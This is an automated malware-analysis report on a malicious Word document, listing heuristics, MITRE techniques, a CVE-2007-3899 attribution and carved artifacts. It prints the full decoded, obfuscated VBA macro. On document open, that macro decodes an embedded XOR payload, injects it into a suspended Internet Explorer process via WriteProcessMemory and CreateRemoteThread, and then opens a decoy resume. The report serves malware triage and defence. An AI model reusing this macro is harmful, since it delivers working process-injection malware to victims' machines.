MALICIOUS
508
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic
The sample is a malicious Microsoft Word document that leverages CVE-2007-3899, a memory corruption vulnerability, to achieve code execution. The VBA macros contain calls to WinAPI functions such as CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, indicating the likely intent to inject and execute a second-stage payload. The presence of XOR-encoded strings and embedded OLE packages further supports this malicious behavior.
Heuristics 16
-
CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
-
OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
-
ClamAV: Doc.Macro.Injection-6355574-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Injection-6355574-0
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREADReference to CreateRemoteThread API
-
XOR-encoded strings (key 0x5A) critical SC_XOR_ENCODEDFound 1 Windows library/API name(s) XOR-encoded with single-byte key 0x5A: 'ADVAPI32.DLL'
Disassembly
Attempted x86 opcode disassembly0003C635 1b1e sbb ebx, dword ptr [esi] 0003C637 0c1b or al, 0x1b 0003C639 0a13 or dl, byte ptr [ebx] 0003C63B 6968741e16165a imul ebp, dword ptr [eax + 0x74], 0x5a16161e 0003C642 5a pop edx 0003C643 5a pop edx 0003C644 5a pop edx 0003C645 3939 cmp dword ptr [ecx], edi 0003C647 295a0f sub dword ptr [edx + 0xf], ebx 0003C64A 0e push cs 0003C64B 1c77 sbb al, 0x77 0003C64D 625a5a bound ebx, qword ptr [edx + 0x5a] 0003C650 5a pop edx 0003C651 0f0e femms 0003C653 1c77 sbb al, 0x77 0003C655 6b6c161f5a imul ebp, dword ptr [esi + edx + 0x1f], 0x5a 0003C65A 5a pop edx 0003C65B 5a pop edx 0003C65C 5a pop edx 0003C65D 0f1413 unpcklps xmm2, xmmword ptr [ebx] 0003C660 19151e1f5a1d sbb dword ptr [0x1d5a1f1e], edx 0003C666 3f aas 0003C667 2e0a28 or ch, byte ptr cs:[eax] 0003C66A 35393f2929 xor eax, 0x29293f39 0003C66F 0d33343e35 or eax, 0x353e3433 0003C674 2d092e3b2e sub eax, 0x2e3b2e09 0003C679 3335345a1d3f xor esi, dword ptr [0x3f1d5a34] 0003C67F 2e0f293f movaps xmmword ptr cs:[edi], xmm7 0003C683 281538303f39 sub byte ptr [0x393f3038], dl 0003C689 2e13343c adc esi, dword ptr cs:[esp + edi] 0003C68D 3528373b2e xor eax, 0x2e3b3728 0003C692 33 .byte 0x33 0003C693 35 .byte 0x35 0003C694 34 .byte 0x34
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim zuyEUBwvBu Set zuyEUBwvBu = CreateObject("ADODB.Stream") zuyEUBwvBu.Type = tGokxOkxcj -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() cnKxRQHXdMtg -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() cnKxRQHXdMtg -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
If Len(Environ("ProgramW6432")) > 0 Then FZTUWHNdxNIa = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe" -
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9300 bytes |
SHA-256: f2abc6d250de8e3c9503849bf486c7e64fce4f2638bab40cf45f445f7419f808 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
85 of 148 identifiers look randomly generated (e.g. 'mTPHtgtuhhCgfAy') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const tGokxOkxcj = 1
Const yfCpjuXVzi = 1, iBjNEmtJSn = 2, lFYZvNmnEd = 8
Private Type svkHMGtJfRvA
xNgghSwGIXgF As Long
XHETiRnOIOTr As Long
hudVNHMplvpl As Long
AuYDBxxPUELV As Long
End Type
Private Type rpdlqsAizKtR
SBENpOaCqhhT As Long
WHZRpTmGGnPR As String
qekmUCkgSkyu As String
EtVlgTegaphC As String
MuWNfBuxTIKO As Long
kCPbmbwkSBdb As Long
fQsifyyrXPdT As Long
qpoykOvyKNlO As Long
xSbPQJFMSNnk As Long
xhCLBvXlTTBX As Long
gbMFBYRIuTmm As Long
eKsOfUYZlaxk As Long
oVTwfSdSyATN As Integer
XXqDiKTLeGYE As Integer
MrjbyoXieMAh As Long
RrBTbvECxWMh As Long
lifIeTJZPfoI As Long
YRdthPyABufO As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function QDamTkzkAwhS Lib "kernel32" Alias "CreateRemoteThread" (ByVal xNgghSwGIXgF As Long, ByVal TajfSOaKlyNY As Long, ByVal WFrDkJWopAAu As Long, ByVal aHPNjOVYjkuM As LongPtr, lkWWlrzfrQEm As Long, ByVal kvhzubhmnhWR As Long, gbZhsnRhDAQp As Long) As LongPtr
Private Declare PtrSafe Function ccutHHdLbTqJ Lib "kernel32" Alias "VirtualAllocEx" (ByVal xNgghSwGIXgF As Long, ByVal umYidabmijQF As Long, ByVal IujFJfXjikKg As Long, ByVal BgvrdYSrgMIR As Long, ByVal pQWmkZNmndbJ As Long) As LongPtr
Private Declare PtrSafe Function lZilpIMnjQTS Lib "kernel32" Alias "WriteProcessMemory" (ByVal xNgghSwGIXgF As Long, ByVal JuXAZvbcweZx As LongPtr, ByRef grtthSmGAjUH As Any, ByVal TTFtmycujLLf As Long, ByVal ZwYvgKNVdsYI As LongPtr) As LongPtr
Private Declare PtrSafe Function vZwPvAkhtkWb Lib "kernel32" Alias "CreateProcessA" (ByVal LffCPosmfmNr As String, ByVal ZbSSuGCANMdK As String, FFTIpglXlMOq As Any, TajfSOaKlyNY As Any, ByVal NVmhoReoXByi As Long, ByVal kvhzubhmnhWR As Long, BIFeEDvHwjoq As Any, ByVal VdWOpNntkPgY As String, FJBijcbHUOSC As rpdlqsAizKtR, kUTSBPrFPsHR As svkHMGtJfRvA) As Long
#Else
Private Declare Function QDamTkzkAwhS Lib "kernel32" Alias "CreateRemoteThread" (ByVal xNgghSwGIXgF As Long, ByVal TajfSOaKlyNY As Long, ByVal WFrDkJWopAAu As Long, ByVal aHPNjOVYjkuM As Long, lkWWlrzfrQEm As Long, ByVal kvhzubhmnhWR As Long, gbZhsnRhDAQp As Long) As Long
Private Declare Function ccutHHdLbTqJ Lib "kernel32" Alias "VirtualAllocEx" (ByVal xNgghSwGIXgF As Long, ByVal umYidabmijQF As Long, ByVal IujFJfXjikKg As Long, ByVal BgvrdYSrgMIR As Long, ByVal pQWmkZNmndbJ As Long) As Long
Private Declare Function lZilpIMnjQTS Lib "kernel32" Alias "WriteProcessMemory" (ByVal xNgghSwGIXgF As Long, ByVal JuXAZvbcweZx As Long, ByRef grtthSmGAjUH As Any, ByVal TTFtmycujLLf As Long, ByVal ZwYvgKNVdsYI As Long) As Long
Private Declare Function vZwPvAkhtkWb Lib "kernel32" Alias "CreateProcessA" (ByVal LffCPosmfmNr As String, ByVal ZbSSuGCANMdK As String, FFTIpglXlMOq As Any, TajfSOaKlyNY As Any, ByVal NVmhoReoXByi As Long, ByVal kvhzubhmnhWR As Long, BIFeEDvHwjoq As Any, ByVal lpCurrentDriectory As String, FJBijcbHUOSC As rpdlqsAizKtR, kUTSBPrFPsHR As svkHMGtJfRvA) As Long
#End If
Sub cnKxRQHXdMtg()
Dim ORaPXCWnNLMe As Long, DEJUdyWdRzJp As Variant, DTPNyTaCSmtl As Long
Dim POVFbElAqElk As svkHMGtJfRvA
Dim AtOshUIkSfgE As rpdlqsAizKtR
Dim fsIvNhSPRjJW As String
Dim FZTUWHNdxNIa As String
Dim bPIWbDKsDK As String
Dim XdRGLKEqmF() As Byte
Dim UCFZKhmEEi As Boolean
#If VBA7 Then
Dim rWuHUgktEqbX As LongPtr, fddzPhSPliSJ As LongPtr
#Else
Dim rWuHUgktEqbX As Long, fddzPhSPliSJ As Long
#End If
DEJUdyWdRzJp = hmlhxkqg
If Len(Environ("ProgramW6432")) > 0 Then
FZTUWHNdxNIa = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
Else
FZTUWHNdxNIa = Environ("PROGRAMFILES") & "\internet explorer\iexplore.exe"
End If
fddzPhSPliSJ = vZwPvAkhtkWb(fsIvNhSPRjJW, FZTUWHNdxNIa, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, fsIvNhSPRjJW, AtOshUIkSfgE, POVFbElAqElk)
rWuHUgktEqbX = ccutHHdLbTqJ(POVFbElAqElk.xNgghSwGIXgF, 0, UBound(DEJUdyWdRzJp), &H1000, &H40)
For DTPNyTaCSmtl = LBound(DEJUdyWdRzJp) To UBound(DEJUdyWdRzJp)
ORaPXCWnNLMe = DEJUdyWdRzJp(DTPNyTaCSmtl)
fddzPhSPliSJ = lZilpIMnjQTS(POVFbElAqElk.xNgghSwGIXgF, rWuHUgktEqbX + DTPNyTaCSmtl, ORaPXCWnNLMe, 1, ByVal 0&)
Next DTPNyTaCSmtl
fddzPhSPliSJ = QDamTkzkAwhS(POVFbElAqElk.xNgghSwGIXgF, 0, 0, rWuHUgktEqbX, 0, 0, 0)
bPIWbDKsDK = Environ("TEMP") & "\Resume (2).doc"
XdRGLKEqmF = vdtevtae
UCFZKhmEEi = KsbcuZbpzm(bPIWbDKsDK, XdRGLKEqmF)
Set temp = ActiveDocument
Documents.Open (bPIWbDKsDK)
temp.Close SaveChanges:=wdDoNotSaveChanges
End Sub
Function KsbcuZbpzm(rASJJubWmd, AtWCTjfzjw)
Dim zuyEUBwvBu
Set zuyEUBwvBu = CreateObject("ADODB.Stream")
zuyEUBwvBu.Type = tGokxOkxcj
zuyEUBwvBu.Open
zuyEUBwvBu.Write AtWCTjfzjw
zuyEUBwvBu.SaveToFile rASJJubWmd, iBjNEmtJSn
End Function
Sub AutoOpen()
cnKxRQHXdMtg
End Sub
Sub Workbook_Open()
cnKxRQHXdMtg
End Sub
Function hmlhxkqg() As Byte()
Dim hcCzdOOBNPoQmAw() As Byte
Dim mTPHtgtuhhCgfAy As Long
Dim VaegvWOIekAOUFD(7) As Byte
Dim DTPNyTaCSmtl As Long
Dim PdihewuviArgiTP() As Byte
Dim UCFZKhmEEi As Boolean
hcCzdOOBNPoQmAw = IEXWPMPhCY(ActiveDocument.FullName)
mTPHtgtuhhCgfAy = KMbsvKCbcv(hcCzdOOBNPoQmAw)
VaegvWOIekAOUFD(0) = 89
VaegvWOIekAOUFD(1) = 68
VaegvWOIekAOUFD(2) = 88
VaegvWOIekAOUFD(3) = 82
VaegvWOIekAOUFD(4) = 81
VaegvWOIekAOUFD(5) = 78
VaegvWOIekAOUFD(6) = 70
VaegvWOIekAOUFD(7) = 73
DTPNyTaCSmtl = lmiXHsJtIc(hcCzdOOBNPoQmAw, VaegvWOIekAOUFD)
PdihewuviArgiTP = OdxXAAOyHk(hcCzdOOBNPoQmAw, DTPNyTaCSmtl + KMbsvKCbcv(VaegvWOIekAOUFD), 212481 - 1)
UCFZKhmEEi = vYtGxWFzfz(PdihewuviArgiTP, KMbsvKCbcv(PdihewuviArgiTP))
hmlhxkqg = PdihewuviArgiTP
End Function
Function vdtevtae() As Byte()
Dim hcCzdOOBNPoQmAw() As Byte
Dim mTPHtgtuhhCgfAy As Long
Dim VaegvWOIekAOUFD(7) As Byte
Dim DTPNyTaCSmtl As Long
Dim PdihewuviArgiTP() As Byte
Dim UCFZKhmEEi As Boolean
hcCzdOOBNPoQmAw = IEXWPMPhCY(ActiveDocument.FullName)
mTPHtgtuhhCgfAy = KMbsvKCbcv(hcCzdOOBNPoQmAw)
VaegvWOIekAOUFD(0) = 79
VaegvWOIekAOUFD(1) = 83
VaegvWOIekAOUFD(2) = 84
VaegvWOIekAOUFD(3) = 86
VaegvWOIekAOUFD(4) = 88
VaegvWOIekAOUFD(5) = 79
VaegvWOIekAOUFD(6) = 90
VaegvWOIekAOUFD(7) = 86
DTPNyTaCSmtl = lmiXHsJtIc(hcCzdOOBNPoQmAw, VaegvWOIekAOUFD)
PdihewuviArgiTP = OdxXAAOyHk(hcCzdOOBNPoQmAw, DTPNyTaCSmtl + KMbsvKCbcv(VaegvWOIekAOUFD), 91368 - 1)
UCFZKhmEEi = vYtGxWFzfz(PdihewuviArgiTP, KMbsvKCbcv(PdihewuviArgiTP))
vdtevtae = PdihewuviArgiTP
End Function
Function KMbsvKCbcv(abArray() As Byte) As Long
Dim nLen As Long
KMbsvKCbcv = UBound(abArray) - LBound(abArray) + 1
End Function
Function IEXWPMPhCY(WIdavqNInj As String)
Dim fqQEZtmCAY() As Byte
Dim hLLoHruxpI As Integer: hLLoHruxpI = FreeFile
Open WIdavqNInj For Binary Access Read As #hLLoHruxpI
ReDim fqQEZtmCAY(0 To LOF(hLLoHruxpI) - 1)
Get #hLLoHruxpI, , fqQEZtmCAY
Close #hLLoHruxpI
IEXWPMPhCY = fqQEZtmCAY
End Function
Function lmiXHsJtIc(yRAUzytyxg() As Byte, InSWDbVSQV() As Byte) As Long
Dim JtlPFmtZxb As Boolean
Dim XvfafqmCwl As Long
Dim KhcWWSjSzH As Long
Dim NfjyhACega As Long
Dim HZBcGDGTdi As Long
JtlPFmtZxb = False
NfjyhACega = KMbsvKCbcv(yRAUzytyxg)
HZBcGDGTdi = KMbsvKCbcv(InSWDbVSQV)
For XvfafqmCwl = 0 To NfjyhACega
JtlPFmtZxb = True
For KhcWWSjSzH = 0 To HZBcGDGTdi - 1
If yRAUzytyxg(XvfafqmCwl + KhcWWSjSzH) <> InSWDbVSQV(KhcWWSjSzH) Then
JtlPFmtZxb = False
Exit For
End If
Next KhcWWSjSzH
If JtlPFmtZxb = True Then
Exit For
End If
Next XvfafqmCwl
If JtlPFmtZxb = False Then
lmiXHsJtIc = -1
Else
lmiXHsJtIc = XvfafqmCwl
End If
End Function
Function OdxXAAOyHk(yRAUzytyxg() As Byte, CZAMdvjYTR As Long, yOCftnDOtp As Long) As Byte()
Dim XJZLYcxXxl() As Byte
Dim XvfafqmCwl As Long
For XvfafqmCwl = 0 To yOCftnDOtp
ReDim Preserve XJZLYcxXxl(XvfafqmCwl)
XJZLYcxXxl(XvfafqmCwl) = yRAUzytyxg(CZAMdvjYTR + XvfafqmCwl)
Next XvfafqmCwl
OdxXAAOyHk = XJZLYcxXxl
End Function
Function vYtGxWFzfz(DTuPXKmgaH() As Byte, yOCftnDOtp As Long)
Dim XexIxXIqPo As Byte
Dim RmhahkOqfk As Long
XexIxXIqPo = 90
For RmhahkOqfk = 0 To yOCftnDOtp - 1
DTuPXKmgaH(RmhahkOqfk) = DTuPXKmgaH(RmhahkOqfk) Xor XexIxXIqPo
Next RmhahkOqfk
End Function
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1612170789/Ole10Native | 91842 bytes |
SHA-256: 684512f174a335f854fdbad1e66292baad0f362863d3b314dad8bd4a68b753a7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.92, consistent with packed or encrypted content.
|
|||
ole10native_01.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1612170790/Ole10Native | 212955 bytes |
SHA-256: 17cf52f85bc83040e8eb6559205231c0c10e971a23863663330a61f4a2c1caf9 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.